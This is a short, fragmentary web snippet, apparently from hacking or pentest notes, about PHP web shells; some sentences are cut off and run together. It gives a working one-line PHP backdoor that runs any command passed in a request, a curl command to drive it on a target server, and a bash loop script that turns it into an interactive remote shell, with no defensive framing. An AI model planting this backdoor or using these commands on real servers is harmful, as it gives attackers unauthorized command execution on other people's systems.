It can send back a shell to an attacker giving unauthorized remote shell access.
Advanced webshell taken from pentest monkey Download Source webpage
MD5sum:2bdf99cee7b302afdc45d1d51ac7e373
SHA1sum: 30a26d5b5e30d819679e0d1eb44e46814892a4eeA piece of code or a script running on a server that enables remote
Tiny simple php backdoor <?php echo system($_REQUEST['cmd']); ?>. Accepts GET and POST requests.
curl -X POST http://target.com/path/to/shell.php -d "cmd=command"Keeping curl persistent with the tiny php backdoor, Create a bash script add following code.
while true;do read -p "[>] halah@wibu:~$ " cmd;curl $1$cmd;done
# Save the filename as cli.sh and give access to execute with chmod +x cli.sh
Usage:
./cli.sh http://target.com/path/to/shell.php?cmd=